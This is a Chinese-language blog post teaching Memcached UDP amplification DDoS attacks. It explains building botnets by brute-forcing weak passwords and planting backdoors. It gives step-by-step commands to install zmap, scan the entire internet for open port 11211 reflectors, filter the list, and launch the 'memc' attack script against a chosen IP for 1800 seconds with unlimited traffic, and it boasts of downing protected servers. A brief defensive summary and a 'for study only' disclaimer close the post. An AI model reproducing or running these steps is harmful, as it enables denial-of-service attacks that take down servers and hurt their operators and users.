阿虎爱分享

 

MEMC放大脚本攻击扫描教程

搬瓦工注册链接:精品稳定服务器购买


发包机要求:G口宽带服务器  必须支持伪造

麻烦把帖子内容一个个字都看过去

阿斯累了这可能是最后一期教程了

没有哪里多精力了 又要工作了

我先来说一下 什么是ddos

ddos就是通过大量的发包把服务器宽带堵塞 来达到瘫痪服务器网络的目的

这样子说你们可能不明白那我就换另外一种方法来说你们可能就会明白了

举个例子一个公交车只可以承载50个人

这个时候我却叫100个人去挤这辆公交车

这个时候这辆公交车就无法正常运行了

DDOS攻击的方式有两种

第一种就是抓鸡集群来攻击

什么是抓鸡 抓鸡就是扫描服务器或者家用电脑指定端口IP地址

然后用弱密码字典来爆破这些IP服务器密码

爆破成功后就可以登录别人的服务器或者家用电脑然后再留下后门木马

这样子你就拥有别人服务器的控制权 然后你就可以操控别人的电脑进行发包攻击

这种方法是最弱的但是不需要什么钱

一般想要集群攻击需要几百只鸡才可以打死一个服务器

另外一种方法就是发包

发包需要一个脚本和一个可以支持伪造的G口或者10G口服务器

什么?你说你不知道什么是G口服务器

1024M等于1G现在明白什么是G口服务器了吧就是1024M宽带的服务器 我们称之为G口服务器

什么?你不知道支持伪造是什么意思?

比如我只有一个固定的IP地址 是111.111.111.111

但是我发包的时候IP地址会进行随机变化

比如111.111.123.123或者是111.111.000.111

现在明白什么是伪造IP地址了吧?

后我们需要有一个发包脚本和一个列表

这样子我们就可以正常进行发包了

阿斯用的10G口服务器一台差不多50G多少的量

 

每家服务器的发包量都是不一样的

需要你自己测试

一般高防服务器100G左右的 阿斯两台就可以打死了 秒恢复的就一直压着打就行了

然后我们再来说一下什么是cc攻击

cc攻击就是模拟多个用户不停地对网页发送大量数据操作

然后就会造成服务器的CPU达到爆满永远都有处理不完的连接请求 然后网络就会拥塞 网页就会无法正常打开

cc攻击只需要一个脚本和一个代理IP

另外特别说明cc不可能打出几十G的量 他的量只有100到200kb左右

cc和ddos完全不是一个性质

好了大概就是这些了

我只把自己理解的说了一下 还有很多都没有说

大佬就不要出来杠我了

DDOS实战视频

 

 

 

晚一点我会发扫表教程以及cc教程

和cc脚本以及cc使用方法

第一步升级所有包,改变软件设置和系统设置,系统版本内核都升级

yum -y update

第二步下载rpm包(区分centos6 与centos7 执行不同的命令)

centos6:

wget http://dl.fedoraproject.org/pub/epel/6/x86_64/epel-release-6-8.noarch.rpm

sudo rpm -Uvh epel-release-6-8.noarch.rpm

centos7:

wget http://mirror.centos.org/centos/7/extras/x86_64/Packages/epel-release-7-11.noarch.rpm

sudo rpm -Uvh epel-release-7-11.noarch.rpm

第三步安装必要的依赖环境

yum install gcc libcap libpcap libpcap-devel screen php dstat cmake gmp gmp-devel gengetopt byacc flex git json-c

第四步安装Zmap

wget https://github.com/zmap/zmap/archive/v1.0.3.tar.gz

tar -zxvf v1.0.3.tar.gz  

cd /root/zmap-1.0.3

cd src/

make

make install

第五步扫描全网11211端口

screen -s memc zmap -p 11211 --probe-args=file:/root/memcache_11211.pkt -o memc1.txt

第六步过滤列表

php MemcacheStatusRespondChecker.php memc1.txt 1122.txt 10 10

memc发包教程

下面是memc udp放大攻击脚本

需要linux系统运行

指令如下

./memc ip memc.txt 1 -1 1800 1

./memc 是运行脚本的意思

ip是你要攻击的ip地址

memc.txt是列表

1是线程

-1是不限制攻击流量

1800是1800秒

 

 

 

 

 

扫描文件已补

帖子已重新编辑



五、总结

DDOS攻击很难通过某一种手段做到完全防御,很多中小型企业,没有能力也没有财力来对抗DDOS攻击。但通过下面的几点,还是可以做到简单的防御:

  1. 保证服务器系统的安全

    首先要确保服务器软件没有任何漏洞,防止攻击者入侵。确保服务器采用最新系统,并打上安全补丁。在服务器上删除未使用的服务,关闭未使用的端口。对于服务器上运行的网站,确保其打了最新的补丁,没有安全漏洞。
    
  2. 隐藏服务器真实IP

    服务器前端加CDN中转(免费的有百度云加速、360网站卫士、加速乐、安全宝等),如果资金充裕的话,可以购买高防的盾机,用于隐藏服务器真实IP,域名解析使用CDN的IP,所有解析的子域名都使用CDN的IP地址。此外,服务器上部署的其他域名也不能使用真实IP解析,全部都使用CDN来解析。
    
    另外,防止服务器对外传送信息泄漏IP,最常见的是,服务器不使用发送邮件功能,如果非要发送邮件,可以通过第三方代理(例如sendcloud)发送,这样对外显示的IP是代理的IP。
    
    总之,只要服务器的真实IP不泄露,10G以下小流量DDOS的预防花不了多少钱,免费的CDN就可以应付得了。如果攻击流量超过20G,那么免费的CDN可能就顶不住了,需要购买一个高防的盾机来应付了,而服务器的真实IP同样需要隐藏。



本文章只供交流学习,请遵纪守法,做一个热爱祖国的好公民!
请不要擅自攻击别人系统,由此造成的一起后果由攻击者自行承担!


搬瓦工注册链接:精品稳定服务器购买

未经允许不得转载:阿虎爱分享----致力于分享各种免费资源 > MEMC放大脚本攻击扫描教程

评论

留言与评论(共有 0 条评论)
   
验证码: